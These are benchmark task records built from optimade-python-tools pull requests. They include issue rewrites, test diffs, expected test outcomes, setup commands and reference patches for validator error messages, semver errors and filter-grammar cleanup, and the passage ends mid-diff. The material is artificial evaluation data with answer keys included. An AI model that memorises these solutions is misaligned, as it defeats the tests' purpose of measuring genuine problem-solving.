**Title** Improve validator handling of `/versions` endpoint and non‑JSON error responses **Problem** When a service’s base URL includes a version segment, the validator does not verify the required unversioned `/versions` endpoint, potentially missing compliance issues. Additionally, services that return rich HTML error pages cause the validator to raise obscure JSON parsing errors. **Root Cause** The validation logic only queried `/versions` for unversioned URLs and treated JSON decode failures as critical without providing context. **Fix / Expected Behavior** - Always request the unversioned `/versions` endpoint, even when a versioned base URL is supplied. - After confirming the unversioned endpoint, ensure that the versioned URL correctly returns a 404 for `/versions`. - Preserve the original client base URL throughout the checks. - Consolidate exception handling to provide a single, clearer error path. - When a response cannot be parsed as JSON, include the content‑type and a graceful message instead of a raw traceback. **Risk & Validation** - Verify that the client’s base URL is correctly restored after the unversioned check to avoid affecting subsequent tests. - Run the validator against services that intentionally serve HTML 404 pages to confirm improved error messages. - Ensure existing compliance tests still pass, confirming that the added 404 check does not introduce false negatives.
665
Materials-Consortia/optimade-python-tools
diff --git a/tests/validator/test_utils.py b/tests/validator/test_utils.py index 5b69199e..5c9e983e 100644 --- a/tests/validator/test_utils.py +++ b/tests/validator/test_utils.py @@ -164,17 +164,14 @@ def test_expected_failure_test_case(): assert validator.results.internal_failure_count == 0 assert output[0] is None - assert ( - output[1] - == "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" - ) + assert output[1] == "JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" assert ( validator.results.optional_failure_messages[-1][0] == "http://example.org/test_request - dummy_test_case - failed with error" ) assert ( validator.results.optional_failure_messages[-1][1] - == "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" + == "JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" )
[ "tests/validator/test_utils.py::test_expected_failure_test_case" ]
[ "tests/validator/test_utils.py::test_normal_test_case", "tests/validator/test_utils.py::test_optional_test_case", "tests/validator/test_utils.py::test_ignored_test_case", "tests/validator/test_utils.py::test_skip_optional_test_case", "tests/validator/test_utils.py::test_unexpected_failure_test_case", "tests/validator/test_utils.py::test_multistage_test_case", "tests/validator/test_utils.py::test_fail_fast_test_case", "tests/validator/test_utils.py::test_that_system_exit_is_fatal_in_test_case" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/validator/test_utils.py" }
{ "num_modified_files": 2, "num_modified_lines": 20, "pr_author": "ml-evs", "pr_labels": [ "bug: Something isn't working", "priority/low: Issue or PR with a consensus of low priority", "validator: Related to the OPTIMADE validator" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests that the validator always check the unversioned `/versions` endpoint and produce clearer error messages for non‑JSON (rich HTML) responses. The provided test changes check that the error message no longer includes the \"Critical:\" prefix, matching the intended improvement. No external URLs, naming expectations, or hidden domain knowledge are required, and the tests align with the described behavior, so the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f80c842ee8e015d41e5c59dcb807b4cd4045fde2
2021-06-09 08:44:33
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#845](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (22f6d55) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/97c0c892cd1011cc2c9119a3370cc83217e23f1e?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (97c0c89) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) ```diff @@ Coverage Diff @@ ## master #845 +/- ## ======================================= Coverage 92.70% 92.70% ======================================= Files 67 67 Lines 3699 3699 ======================================= Hits 3429 3429 Misses 270 270 ``` | Flag | Coverage Δ | | |---|---|---| | project | `92.70% <100.00%> (ø)` | | | validator | `92.70% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/models/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845/diff?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3V0aWxzLnB5) | `91.56% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=footer&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Last update [f80c842...22f6d55](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=lastupdated&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-845
diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 5a47b795..8887656e 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -145,7 +145,10 @@ class SemanticVersion(str): @classmethod def validate(cls, v: str): if not cls.regex.match(v): - raise ValueError(f"Unable to validate version {v} as a semver.") + raise ValueError( + f"Unable to validate the version string {v!r} as a semantic version (expected <major>.<minor>.<patch>)." + "See https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string for more information." + ) return v
Improve semver validation error messsage Minor fix arising from some validation of AFLOW yesterday (that "1.0" is not a valid semver, and also that semver may not be well known as an abbreviation).
**Title** Improve the clarity of semantic version validation errors **Problem** When a version string fails semantic‑version validation, the raised error provides little guidance, leading to confusion (e.g., treating “1.0” as valid). Users need a more informative message that explains the required format. **Root Cause** The validation routine emits a generic error that does not describe the expected `<major>.<minor>.<patch>` pattern nor reference the semver specification. **Fix / Expected Behavior** - Error now explicitly states that the input must be a semantic version string. - The message shows the offending value in a quoted form for clarity. - It specifies the exact `<major>.<minor>.<patch>` structure required. - A link to the official semver specification is included for further guidance. **Risk & Validation** - Only the error text changes; exception type and validation logic remain unchanged, minimizing impact. - Ensure existing tests that check for version validation still pass with the updated message, updating expectations if necessary. - Manually verify that valid semantic versions are accepted and invalid ones raise the new, descriptive error.
845
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_baseinfo.py b/tests/models/test_baseinfo.py index 70ad3bfd..e7230f29 100644 --- a/tests/models/test_baseinfo.py +++ b/tests/models/test_baseinfo.py @@ -15,6 +15,8 @@ def test_available_api_versions(): ] bad_versions = [ {"url": "https://example.com/v0", "version": "v0.1.9"}, + {"url": "https://example.com/v0", "version": "0.1"}, + {"url": "https://example.com/v1", "version": "1.0"}, {"url": "https://example.com/v1.0.2", "version": "v1.0.2"}, {"url": "https://example.com/optimade/v1.2", "version": "v1.2.3"}, {"url": "https://example.com/v1.0.0", "version": "1.asdfaf.0-rc55"}, @@ -48,7 +50,8 @@ def test_available_api_versions(): with pytest.raises(ValueError) as exc: AvailableApiVersion(**data) assert ( - f"Unable to validate version {data['version']} as a semver" in exc.exconly() + f"Unable to validate the version string {data['version']!r} as a semantic version (expected <major>.<minor>.<patch>)" + in exc.exconly() ), f"SemVer validator not triggered as it should.\nException message: {exc.exconly()}.\nInputs: {data}" for data in bad_combos:
[ "tests/models/test_baseinfo.py::test_available_api_versions" ]
[]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_baseinfo.py" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "ml-evs", "pr_labels": [ "models: For issues related to the pydantic models directly", "priority/low: Issue or PR with a consensus of low priority" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests an improved semantic version validation error message but does not specify the exact wording, while the added test asserts a very specific message. The test therefore adds requirements not present in the issue description, indicating an ambiguous specification. This aligns with a B4 ambiguous spec situation rather than a clean A problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test expects a detailed error string that is not described in the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
38015610d404b044af263ff9eb0bf411cec5b38d
2021-07-20 17:08:48
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#879](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (ae51874) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/1f7ec8a96b4f9f93f3d4b3695aac2245851c33b1?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (1f7ec8a) will **increase** coverage by `0.00%`. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) ```diff @@ Coverage Diff @@ ## master #879 +/- ## ======================================= Coverage 92.74% 92.74% ======================================= Files 67 67 Lines 3763 3764 +1 ======================================= + Hits 3490 3491 +1 Misses 273 273 ``` | Flag | Coverage Δ | | |---|---|---| | project | `92.74% <100.00%> (+<0.01%)` | :arrow_up: | | validator | `92.74% <100.00%> (+<0.01%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/filterparser/lark\_parser.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879/diff?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvZmlsdGVycGFyc2VyL2xhcmtfcGFyc2VyLnB5) | `95.12% <100.00%> (+0.12%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=footer&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Last update [1f7ec8a...ae51874](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=lastupdated&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). ml-evs: > There seem to have been added a lot of files in the folder testfiles. Was this intentional, or are these temporary files that should be removed? Never mind, I had read only the initial version of your message at the start of this PR. I think there's probably a better way of doing this so I will convert to a draft PR for now. Perhaps an `invoke` task that takes the examples from the spec repo and condenses them into one file with some tags for the examples which are expected to fail. ml-evs: Also apologies @markus1978, this PR touches one line of the elastic tests so you ended up getting pinged as a reviewer, feel free to ignore. ml-evs: Thought I'd have a bit more time to extend this, but its probably useful as-is. The tests still only check whether parsing does "something", not necessarily the right thing, but we "know" the grammar works so I can't justify spending more time on these tests.
materials-consortia__optimade-python-tools-879
diff --git a/optimade/filterparser/lark_parser.py b/optimade/filterparser/lark_parser.py index f1200ed0..ab327602 100644 --- a/optimade/filterparser/lark_parser.py +++ b/optimade/filterparser/lark_parser.py @@ -61,7 +61,10 @@ class LarkParser: """ - version = version if version else max(AVAILABLE_PARSERS.keys()) + if not version: + version = max( + _ for _ in AVAILABLE_PARSERS if AVAILABLE_PARSERS[_].get("default") + ) if version not in AVAILABLE_PARSERS: raise ParserError(f"Unknown parser grammar version: {version}") diff --git a/optimade/grammar/v0.9.5.lark b/optimade/grammar/v0.9.5.lark deleted file mode 100644 index 4ca776c9..00000000 --- a/optimade/grammar/v0.9.5.lark +++ /dev/null @@ -1,28 +0,0 @@ -// optimade v0.9.5 grammar spec in lark grammar format - -start: KEYWORD expression -KEYWORD: "filter=" -expression: [expression OR] term -term: [term AND] atom -atom: [NOT] comparison - | [NOT] "(" (andcomparison OR)* andcomparison ")" -andcomparison: [NOT] (NOT comparison AND)* comparison -comparison: VALUE OPERATOR VALUE -OPERATOR: /<=?|>=?|!?=/ -VALUE: CNAME | SIGNED_FLOAT | SIGNED_INT | ESCAPED_STRING -AND: /and/i -OR: /or/i -NOT: /not/i - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - -%import common.CNAME -%import common.SIGNED_FLOAT -%import common.SIGNED_INT -%import common.WS_INLINE -%ignore WS_INLINE diff --git a/optimade/grammar/v0.9.6.lark b/optimade/grammar/v0.9.6.lark deleted file mode 100644 index fde92c58..00000000 --- a/optimade/grammar/v0.9.6.lark +++ /dev/null @@ -1,33 +0,0 @@ -// optimade v0.9.6 grammar spec in lark grammar format - -start: KEYWORD expression -KEYWORD: "filter=" | "filter =" -expression: [expression CONJUNCTION] term -term: [term CONJUNCTION] atom | "(" [term CONJUNCTION] term - -atom: [NOT] comparison - -comparison: VALUE OPERATOR VALUE [")"] | VALUE OPERATOR "'" (combined)* "'" -OPERATOR: /<=?|>=?|!?=/ - -combined: VALUE ", " | VALUE "," | VALUE - -VALUE: CNAME | SIGNED_FLOAT | SIGNED_INT | ESCAPED_STRING - -CONJUNCTION: AND | OR -AND: /and/i -OR: /or/i -NOT: /not/i - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - -%import common.CNAME -%import common.SIGNED_FLOAT -%import common.SIGNED_INT -%import common.WS_INLINE -%ignore WS_INLINE diff --git a/optimade/grammar/v0.9.7.lark b/optimade/grammar/v0.9.7.lark deleted file mode 100644 index 8daeea41..00000000 --- a/optimade/grammar/v0.9.7.lark +++ /dev/null @@ -1,34 +0,0 @@ -// optimade v0.9.7 grammar spec in lark grammar format -// CHANGED start to not require KEYWORD filter= - -start: expression -expression: [expression CONJUNCTION] term -term: [term CONJUNCTION] atom | "(" [term CONJUNCTION] term ")" - -atom: [NOT] comparison - -comparison: VALUE OPERATOR VALUE | VALUE OPERATOR "'" combined "'" - -OPERATOR: /<=?|>=?|!?=/ - -combined: (VALUE ",")* VALUE - -VALUE: CNAME | SIGNED_FLOAT | SIGNED_INT | ESCAPED_STRING - -CONJUNCTION: AND | OR -AND: /and/i -OR: /or/i -NOT: /not/i - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - -%import common.CNAME -%import common.SIGNED_FLOAT -%import common.SIGNED_INT -%import common.WS_INLINE -%ignore WS_INLINE diff --git a/optimade/grammar/v0.10.1.lark b/optimade/grammar/v1.0.1.lark similarity index 100% rename from optimade/grammar/v0.10.1.lark rename to optimade/grammar/v1.0.1.lark diff --git a/optimade/grammar/v1.1.0.lark b/optimade/grammar/v1.1.0.lark new file mode 120000 index 00000000..c5582225 --- /dev/null +++ b/optimade/grammar/v1.1.0.lark @@ -0,0 +1,1 @@ +v1.0.0.lark \ No newline at end of file diff --git a/optimade/grammar/v0.10.0.lark b/optimade/grammar/v1.2.0.develop.lark similarity index 74% rename from optimade/grammar/v0.10.0.lark rename to optimade/grammar/v1.2.0.develop.lark index 7a817514..12ec22c0 100644 --- a/optimade/grammar/v0.10.0.lark +++ b/optimade/grammar/v1.2.0.develop.lark @@ -1,4 +1,4 @@ -// optimade v0.10.0 grammar spec in lark grammar format +// optimade v1.2.0 (expected version) grammar spec in lark grammar format ?start: filter filter: expression* @@ -6,7 +6,11 @@ filter: expression* // Values constant: string | number // Note: support for property in value is OPTIONAL -value: string | number | property +value: string | bool | number | property + +// Note: not_implemented_string is only here to help Transformers +non_string_value: number | property +not_implemented_string: string // Note: support for OPERATOR in value_list is OPTIONAL value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* @@ -17,7 +21,7 @@ value_zip_list: value_zip ( "," value_zip )* // Expressions expression: expression_clause ( _OR expression_clause )* expression_clause: expression_phrase ( _AND expression_phrase )* -expression_phrase: [ NOT ] ( comparison | predicate_comparison | "(" expression ")" ) +expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) // Note: support for constant_first_comparison is OPTIONAL comparison: constant_first_comparison | property_first_comparison @@ -26,15 +30,16 @@ property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs - | set_zip_op_rhs ) + | set_zip_op_rhs + | length_op_rhs ) -constant_first_comparison: constant value_op_rhs +constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) value_op_rhs: OPERATOR value known_op_rhs: IS ( KNOWN | UNKNOWN ) -fuzzy_string_op_rhs: CONTAINS string - | STARTS [ WITH ] string - | ENDS [ WITH ] string +fuzzy_string_op_rhs: CONTAINS value + | STARTS [ WITH ] value + | ENDS [ WITH ] value // Note: support for ONLY in set_op_rhs is OPTIONAL // Note: support for [ OPERATOR ] in set_op_rhs is OPTIONAL // set_op_rhs: HAS [ ALL | ANY | ONLY] value_list @@ -43,8 +48,10 @@ set_op_rhs: HAS ( [ OPERATOR ] value | ANY value_list | ONLY value_list ) +// Note: support for [ OPERATOR ] is OPTIONAL +length_op_rhs: LENGTH [ OPERATOR ] signed_int + set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | ANY value_zip_list ) -predicate_comparison: LENGTH property OPERATOR value property_zip_addon: ":" property (":" property)* // Property syntax @@ -53,9 +60,15 @@ property: IDENTIFIER ( "." IDENTIFIER )* // String syntax string: ESCAPED_STRING +// Bool token syntax +bool: ( "TRUE" | "FALSE" ) + // Number token syntax number: SIGNED_INT | SIGNED_FLOAT +// Custom signed int +signed_int: SIGNED_INT + // Tokens // Boolean relations @@ -92,7 +105,6 @@ _STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - %import common.SIGNED_INT %import common.SIGNED_FLOAT
Tidy up old grammars, add a development grammar for v1.2 and update filterparser tests This PR does the following: - removes pre-1.0 grammars and their tests - Adds a v1.2 grammar that includes `TRUE` and `FALSE` tokens, - Adds links to a v1.1.0 and v1.0.1 grammars based on v1.0.0 - Unifies the testing of grammars such that each new grammar version inherits the tests from previous versions
**Title** Update grammar assets, introduce development grammar for v1.2, and refine default parser selection **Problem** Legacy grammar specifications for pre‑1.0 releases were still bundled, causing unnecessary maintenance overhead and potential version conflicts. The parser’s version resolution logic could select a non‑default grammar when multiple versions were available, leading to ambiguous behavior. **Root Cause** Outdated grammars were never pruned, and the version‑lookup routine always chose the highest numeric version without considering the designated default. **Fix / Expected Behavior** - Remove all obsolete pre‑1.0 grammar definitions and their associated tests. - Add a new development grammar for the upcoming v1.2 release, incorporating Boolean literals and enhanced operators. - Rename legacy grammar references to reflect the stable v1.0.x and v1.1.0 lineages. - Adjust the parser’s version selection to pick the highest version explicitly marked as the default. - Ensure that test suites automatically inherit and validate the updated grammars across versions. **Risk & Validation** - Verify that the parser loads the correct default grammar for typical use cases. - Run the full test matrix to confirm backward compatibility with earlier supported versions. - Manually test parsing of Boolean literals (`TRUE`, `FALSE`) and new length/operator constructs introduced in v1.2.
879
Materials-Consortia/optimade-python-tools
diff --git a/tests/filterparser/test_filterparser.py b/tests/filterparser/test_filterparser.py index 913fc707..99007b9d 100644 --- a/tests/filterparser/test_filterparser.py +++ b/tests/filterparser/test_filterparser.py @@ -1,5 +1,5 @@ -import os -from glob import glob +import abc +from typing import Tuple import pytest @@ -8,49 +8,35 @@ from lark import Tree from optimade.filterparser import LarkParser from optimade.server.exceptions import BadRequest -testfile_dir = os.path.join(os.path.dirname(__file__), "testfiles") +class BaseTestFilterParser(abc.ABC): + """Base class for parsing different versions of the grammar using `LarkParser`.""" + + version: Tuple[int, int, int] + variant: str = "default" -class TestParserV0_9_5: @pytest.fixture(autouse=True) def set_up(self): - self.test_filters = [] - for fn in sorted(glob(os.path.join(testfile_dir, "*.inp"))): - with open(fn) as f: - self.test_filters.append(f.read().strip()) - self.parser = LarkParser(version=(0, 9, 5)) - - def test_inputs(self): - for tf in self.test_filters: - if tf == "filter=number=0.0.1": - with pytest.raises(BadRequest): - self.parser.parse(tf) - else: - tree = self.parser.parse(tf) - assert isinstance(tree, Tree) - - def test_parser_version(self): - v = (0, 9, 5) - p = LarkParser(version=v) - assert isinstance(p.parse(self.test_filters[0]), Tree) - assert p.version == v + self.parser = LarkParser(version=self.version, variant=self.variant) def test_repr(self): assert repr(self.parser) is not None - self.parser.parse(self.test_filters[0]) + self.parse("band_gap = 1") assert repr(self.parser) is not None + def parse(self, inp): + return self.parser.parse(inp) -class TestParserV1_0_0: - version = (1, 0, 0) - variant = "default" + def test_parser_version(self): + assert self.parser.version == self.version + assert self.parser.variant == self.variant - @pytest.fixture(autouse=True) - def set_up(self): - self.parser = LarkParser(version=self.version, variant=self.variant) - def parse(self, inp): - return self.parser.parse(inp) +class TestParserV1_0_0(BaseTestFilterParser): + """Test cases for the v1.0.0 stable release grammar.""" + + version = (1, 0, 0) + variant = "default" def test_empty(self): assert isinstance(self.parse(" "), Tree) @@ -276,11 +262,34 @@ class TestParserV1_0_0: with pytest.raises(BadRequest): self.parse("NOTICE=val") # not valid property or value (NOTICE) - def test_parser_version(self): - assert self.parser.version == self.version - assert self.parser.variant == self.variant - def test_repr(self): - assert repr(self.parser) is not None - self.parser.parse('key="value"') - assert repr(self.parser) is not None +class TestParserV1_2_0(TestParserV1_0_0): + """Additional tests for the v1.2.0 development grammar. + + Should additionally pass all v1.0.0 tests. + + """ + + version = (1, 2, 0) + variant = "develop" + + def test_boolean_values(self): + assert isinstance( + self.parse("_exmpl_element_counts = TRUE"), + Tree, + ) + + assert isinstance( + self.parse("_exmpl_element_counts = FALSE"), + Tree, + ) + + assert isinstance( + self.parse("_exmpl_element_counts != FALSE"), + Tree, + ) + + assert isinstance( + self.parse("NOT _exmpl_element_counts = TRUE"), + Tree, + ) diff --git a/tests/filterparser/testfiles/parse_001.inp b/tests/filterparser/testfiles/parse_001.inp deleted file mode 100644 index e1587e24..00000000 --- a/tests/filterparser/testfiles/parse_001.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=te < st diff --git a/tests/filterparser/testfiles/parse_002.inp b/tests/filterparser/testfiles/parse_002.inp deleted file mode 100644 index 43c1f436..00000000 --- a/tests/filterparser/testfiles/parse_002.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=spacegroup="P2" diff --git a/tests/filterparser/testfiles/parse_003.inp b/tests/filterparser/testfiles/parse_003.inp deleted file mode 100644 index e2b5634d..00000000 --- a/tests/filterparser/testfiles/parse_003.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=_cod_cell_volume<100.0 diff --git a/tests/filterparser/testfiles/parse_004.inp b/tests/filterparser/testfiles/parse_004.inp deleted file mode 100644 index f1b1faef..00000000 --- a/tests/filterparser/testfiles/parse_004.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=_mp_bandgap > 5.0 AND _cod_molecular_weight < 350 diff --git a/tests/filterparser/testfiles/parse_005.inp b/tests/filterparser/testfiles/parse_005.inp deleted file mode 100644 index 4df410ea..00000000 --- a/tests/filterparser/testfiles/parse_005.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=_cod_melting_point<300 AND nelements=4 AND elements="Si,O2" diff --git a/tests/filterparser/testfiles/parse_006.inp b/tests/filterparser/testfiles/parse_006.inp deleted file mode 100644 index 62a22952..00000000 --- a/tests/filterparser/testfiles/parse_006.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=number=0.ANDnumber=.0ANDnumber=0.0ANDnumber=+0ANDNUMBER=-0ANDnumber=0e1ANDnumber=0e-1ANDnumber=0e+1 diff --git a/tests/filterparser/testfiles/parse_007.inp b/tests/filterparser/testfiles/parse_007.inp deleted file mode 100644 index 838d97fe..00000000 --- a/tests/filterparser/testfiles/parse_007.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=number=0.0.1 diff --git 